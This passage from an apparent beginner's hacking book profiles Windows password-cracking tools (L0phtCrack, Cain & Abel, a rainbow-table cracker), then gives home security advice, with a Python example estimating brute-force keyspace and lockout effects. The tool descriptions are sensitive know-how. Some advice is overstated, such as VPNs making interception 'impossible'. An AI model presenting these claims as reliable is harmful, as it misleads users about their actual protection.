on Windows, Linux and Mac, but the passwords it cracks are Windows 
ones, specifically the LM and NTLM hashes Windows stores. Its speed 
comes from rainbow tables: huge precomputed tables of hashes that let 
it look a password up instead of computing millions of guesses. It 
also has a brute force fallback for passwords the tables don’t cover. 
Lastly, it is available as a live boot image, so it can be booted on 
a Windows machine and run against the local password hashes without 
needing to log in. 


L0phtCrack 


L0phtCrack is really a suite of software that allows you to perform 
many different password functions. For example, it can be used to 
audit password strength and complexity to bolster your security 
efforts. Given the range of functions this software provides, it is 
frequently used by computer security firms as well as government and 
military organizations. Not only can it run on Windows XP and later, 
it can also run on some Linux and BSD distributions. Like other 
password cracking utilities, it will allow an attacker or security 
expert to run both dictionary based attacks and brute force attacks. 


Cain & Abel 


Cain & Abel is another popular password cracking utility. Its features 
go well beyond cracking basic passwords or operating system 
passwords, and it even has some features that aid in the process of 
wireless security-key cracking. However, it runs exclusively in a 
Windows environment. It allows users to crack passwords that have 
been hashed or encoded in various formats and protocols such as 
MySQL, Oracle, MD5, SHA1, SHA2, and various wireless encryption 
algorithms. 


As with the other utilities, this software will perform a variety of 
different password cracking methods such as dictionary attacks, 
rainbow-table attacks, and brute force attacks. One extremely useful 
feature of this software is that you can set parameters to fine-tune 
the brute force attack, such as the length and character set of the 
password you are trying to crack. This eliminates millions of 
potential password combinations that would otherwise drastically 
multiply the length of time needed to carry out the attack. 


In Summary 


These tools aren’t incredibly difficult to use, but most users don’t have 
any clue that they exist. Really, all of the hard work has been done 
already by the expert programmers who created this software. All 
that’s left to do is for it to be used by an experienced hacker. Tools 
like these are so easy to use that teenagers with little experience in the 
real world can find ways to use them to hack into other people’s 
computers. Though I wouldn’t recommend using these tools for evil, 
they are certainly fun to use in a home environment. 


Chapter 16 — Protecting Yourself from Hackers 


At this point in the book you have probably already asked yourself at 
least once, “What can I do to protect myself from hackers?” The good 
news is that there are a lot of easy and simple measures you can take 
that will drastically reduce your chance of being hacked by a 
nefarious black hat hacker on the Internet. This chapter focuses on the 
different strategies you can use to make your computer and home 
network more secure. For those of you who are very technologically 
savvy, a few of these might seem like no-brainers. However, you 
would be surprised how many people fail to implement even the 
simplest measures regarding their Internet security. 


Software Updates 


Software updates are crucial to protecting yourself from hackers, but 
too many people ignore updates. Most operating systems have an 
automatic update setting that will automatically download and install 
patches to the operating system. The problem is that most people are 
apathetic or just plain lazy and they don’t want to take the time to 
install the updates. And why not? To be honest, it’s a bit of an 
inconvenience to some people. You might be right in the middle of a 
large project or your work day, and installing updates requires that 
you reboot your computer and wait for an unknown amount of time 
while the operating system installs the patches. But I’ve got news for 
you — you need to take great care to install updates as soon as 
humanly possible. 


Even after some of the viruses mentioned in chapter 3 were discovered 
and patched, there were still millions of computers that contained 
the vulnerabilities, all because the users failed to update their 
software. If everyone had installed the updates as they came out, the 
viruses would have been stopped dead in their tracks. 


Change Default Usernames and Passwords 


Too many people don’t think twice about changing the default 
usernames and passwords on their networking equipment. While most 
people try to create unique usernames and passwords for their 
personal computers, they often forget to secure network devices, 
wireless routers, and even their printers. Wake up, people: hackers not 
only have ways to perform password attacks, but they already know 
how to find the default usernames and passwords to your wireless 
router in a matter of seconds. 


Furthermore, some people fail to secure their Wi-Fi network. Instead 
of using a security algorithm that will make it hard for attackers to 
join their network subnet, they give them an open door and invite 
them to come inside. Some, but not all, wireless routers don’t include 
a default wireless password. 


Worse yet, when people are initially configuring their wireless 
routers, they fail to add a password to their Wi-Fi. You simply can’t 
leave these values at their defaults if you hope to protect yourself 
from online attacks. Lastly, most wireless home routers have an option 
in the configuration that determines who can remotely manage the 
device. If you lock down this setting to a specific IP address, hackers 
won't be able to log into your wireless router even if they know the 
username and password! 


Use Strong Passwords 


Not only should you create unique usernames and passwords for your 
devices that are different from the default values, but you should also 
make your passwords strong. You can do this by making them as long 
as possible and by including numbers, letters, and special characters. 
Though it’s true that hackers have ways to perform dictionary and 
brute force attacks whereby they try to go through every possible 
combination to find the correct password for a system, know that 
these techniques don’t work in every situation. Some websites and 
networking devices have built-in protection against brute force attacks 
that won’t allow you to attempt to log in for a certain time period 
after a specified number of failed login attempts. Password security is a 
huge area of study, and most hackers know what types of data users 
incorporate into their passwords to remember them easier. So don’t 
make your street address, family pet’s name, or birthdays part of your 
passwords. 
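The two points above, a brute force tuned to a fixed password length and a lockout that throttles online guessing, can be put into numbers. The Python below is an added example, not code from this book or from L0phtCrack or Cain & Abel; the guess rate, the lockout policy and the owner's personal facts are assumed sample values, and the last function goes a step beyond the text by flagging the pet names and birthdays the chapter warns against.

```python
import string

# Symbol counts a brute-force tool must cover for each character class.
CLASS_SIZES = {"lower": 26, "upper": 26, "digit": 10,
               "special": len(string.punctuation)}  # 32 printable symbols


def charset_size(password: str) -> int:
    """Alphabet an attacker must assume, based on the classes actually used."""
    size = 0
    if any(c.islower() for c in password):
        size += CLASS_SIZES["lower"]
    if any(c.isupper() for c in password):
        size += CLASS_SIZES["upper"]
    if any(c.isdigit() for c in password):
        size += CLASS_SIZES["digit"]
    if any(c in string.punctuation for c in password):
        size += CLASS_SIZES["special"]
    return size


def keyspace(password: str) -> int:
    """Candidates a brute force fixed to this length must cover to be sure of a hit."""
    return charset_size(password) ** len(password)


def offline_hours(password: str, guesses_per_sec: float) -> float:
    """Hours to exhaust the keyspace when a stolen hash is attacked with no lockout."""
    return keyspace(password) / guesses_per_sec / 3600


def online_years(password: str, tries_per_lockout: int, lockout_minutes: int) -> float:
    """Years to exhaust the keyspace against a service that locks out after N failed tries."""
    tries_per_year = tries_per_lockout * (60 / lockout_minutes) * 24 * 365
    return keyspace(password) / tries_per_year


def personal_terms_in(password: str, known_facts) -> list:
    """Facts about the owner (pet, street, birth year) that appear inside the password."""
    lowered = password.lower()
    return [fact for fact in known_facts if fact.lower() in lowered]


if __name__ == "__main__":
    facts = ["Rex", "1984", "Elm"]  # constructed sample: pet, birth year, street
    for pw in ["rex1984", "Rex1984!", "Tq7$mVp2#xL9wB"]:
        print(f"{pw:16} alphabet={charset_size(pw):3} keyspace={keyspace(pw):.2e} "
              f"offline@1e9/s={offline_hours(pw, 1e9):.2e} h "
              f"online(5 tries/15 min)={online_years(pw, 5, 15):.2e} y "
              f"personal={personal_terms_in(pw, facts)}")
```

Note that the same seven-character password that falls to an offline attack in well under an hour at the assumed rate would take a lockout-protected service hundreds of thousands of years to exhaust, which is exactly why the chapter says these attacks don't work in every situation.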


Oh, and don’t be one of those jokers that has their password written 
on a sticky note that is attached to your monitor. A hacker 
implementing social engineering wouldn’t even have to try. You’re 
making it too easy for them by displaying your passwords for all the 
world to see. In addition, make sure that you don’t store your 
passwords in plain text files or other types of files that aren’t 
encrypted. If a hacker does steal some of your data and they get their 
hands on a file that contains usernames and passwords to other sites 
and services, you’re in for a world of hurt. 


Properly Configure Your Firewalls 


Firewalls are a critical part of any security solution designed to protect 
users from hackers, and you need to make sure that your firewall is 
configured correctly. In the past, I have seen some people struggle 
with opening the right ports to get their software configured correctly. 
One area this happens a lot is with gaming. 


Many games need specific ports opened that aren’t well known, and in 
a fit of madness and frustration, users choose to open all the ports on 
their firewall to make their game work correctly. This is a colossal 
mistake, because it will allow hackers to penetrate your network 
firewall if none of the ports are blocked. If you have problems getting 
a game to work on your home network, just do a quick Google search 
to see which port needs to be opened! 


Furthermore, many people fail to take advantage of software firewalls. 
While many hardware firewalls have most of the ports blocked by 
default and do a good job of protecting a local area network, few 
people protect themselves with a firewall on their host computer. If 
you are a Windows user, whether you know it or not you already have 
a software firewall that will add an extra layer of protection between 
you and black hat hackers. Though sometimes it is appropriate to 
disable your software firewall to allow a program to function 
correctly, you always need to remember to re-enable it after you have 
finished your work. 


Antivirus and Antimalware Software Solutions 


If you do get hacked and a hacker manages to hack your system with 
a virus or a Trojan, how will you know it exists without antivirus and 
antimalware software? Using a computer without security software is 
like begging for an attacker to steal your personal information. 


But it doesn’t stop there. It has been said many times before, but 
understand that torrents are frequently used as a distribution system 
for viruses. Too many people have fallen victim to a hacker’s virus 
because they wanted to watch some video content without paying for 
it. If you download torrents without antivirus software, you’re just 
asking for trouble. If you do have antivirus software, you can scan the 
files you download before opening them to detect any potential 
malicious code embedded in your download and avoid a computing 
crisis. For that matter, you should scan every download before you 
open it. You never know what could be hiding in an innocent-looking 
file. 


Using VPNs 


If you aren’t aware of VPN tunnels, you need to know the immense 
value they bring to the table. A VPN (Virtual Private Network) is 
essentially a service that encrypts all data communications between 
two endpoints — effectively making it impossible for a hacker, 
governmental agency, or petty Internet crook to unscramble and 
decipher the data. This guide isn’t promotional material for VPN 
providers, but the fact of the matter is that they can prevent you from 
getting hacked. Not only that, but they can stop the government from 
stealing your data. As a result of the information leaked by Edward 
Snowden, the US government and the N.S.A. have been found to be 
capturing emails, photos, telephone calls, instant messages, and many 
other types of data transmissions in an effort to prevent terrorist- 
related activities. However, the N.S.A. has stated that they haven’t 
found any information that has stopped even one terrorist-related 
event. By encrypting your data, you will make it safe from hackers 
around the world while it is in transit through the public Internet. 


Backing Up Your Data 


You might think that backing up your data is only a measure to 
protect yourself from hardware failure. While it does certainly help 
you out a ton if your computer fries, you should know that using 
backup software will protect you from black hat attacks as well. Some 
of the more sophisticated attacks damage and corrupt files, or even 
embed malicious code into common everyday files such as Word 
documents. By keeping a backup copy, you can rest assured that you 
will have a clean and virus free copy of your data in the event of an 
attack. Remember the CryptoLocker virus in chapter 3? If only the 
users had backed up their data, they wouldn’t have had to worry 
about paying an Internet huckster loads of money to reclaim their 
data by means of ransom. 


Web Browser Security 


There are also a lot of things you can change in your web browser that 
will drastically reduce the chance of a successful attack. As we 
discussed earlier, hackers can use malicious scripts to steal cookies 
and web browser data, and with them the passwords to various sites. 


Make sure you don’t save and cache all of your username and 
password information in your web browser when visiting your 
favorite sites on the Internet. This is a huge No-No, because you are 
leaving low-hanging fruit ripe for the picking within the grasp of black 
hat hackers and Internet thieves. You’re also a lot better off if you 
disable cookies in the first place. By disabling cookies, you can 
circumvent a whole range of different online attacks and nip them in 
the bud before they become a real problem. 


It’s best to keep your web browser as light and streamlined as 
possible, and the more data you save in your browser the greater the 
chance that someone will be able to steal your information. Also 
consider that you should frequently clear your history as well. Your 
browsing history is a veritable audit trail, and an attacker could use 
it to see every website you have visited on the Internet. 


Final Thoughts 


I want to make sure you understand that no code will ever be 100% 
infallible. Computers are created and manufactured by humans who 
are anything but perfect, and mistakes are always made. That is to say 
you run the risk of being attacked every time you fire up your 
computer and open your web browser — regardless of whether or not 
you have implemented these security practices. 


In fact, they say that the most secure computing system is one that 
doesn’t have the ability to connect to the Internet at all. However, 
implementing these security measures will make it much more 
difficult for an attacker to successfully compromise your computer. 
Think of using these security practices in the same light as risk 
aversion. For example, if someone is a vegetarian their whole life and 
they abstain from alcohol and smoking, the chance that they will 
develop a chronic or life-threatening disease is slim to none. 


Though it is still possible, their lifestyle choices severely reduce their 
risk of disease. Likewise, implementing these security procedures 
works in much the same way. The ugly truth is that operating systems 
and websites contain flaws and errors that can be exploited by 
hackers. It’s just a fact of life. But by strengthening your security, you 
make it much more difficult — if not impossible in some cases — for an 
attacker to successfully hack into your computer. 


